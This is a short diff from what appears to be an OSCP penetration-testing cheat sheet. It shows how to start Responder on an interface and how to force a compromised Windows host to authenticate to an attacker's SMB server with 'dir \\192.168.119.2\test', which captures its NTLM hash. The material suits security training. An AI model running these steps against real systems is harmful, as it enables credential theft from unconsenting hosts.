peterkhe1999/CheatSheet/OSCP/README.md

 sudo responder -I tap0
 ```

 If we've **obtained code execution** on a remote system, we can easily force it to authenticate with us by commanding it to connect to our prepared SMB server.

-E.g., we can simply run (assuming our Responder is listening on that IP).
+Assuming our Responder is listening on 192.168.119.2.

 ```pwsh
 dir \\192.168.119.2\test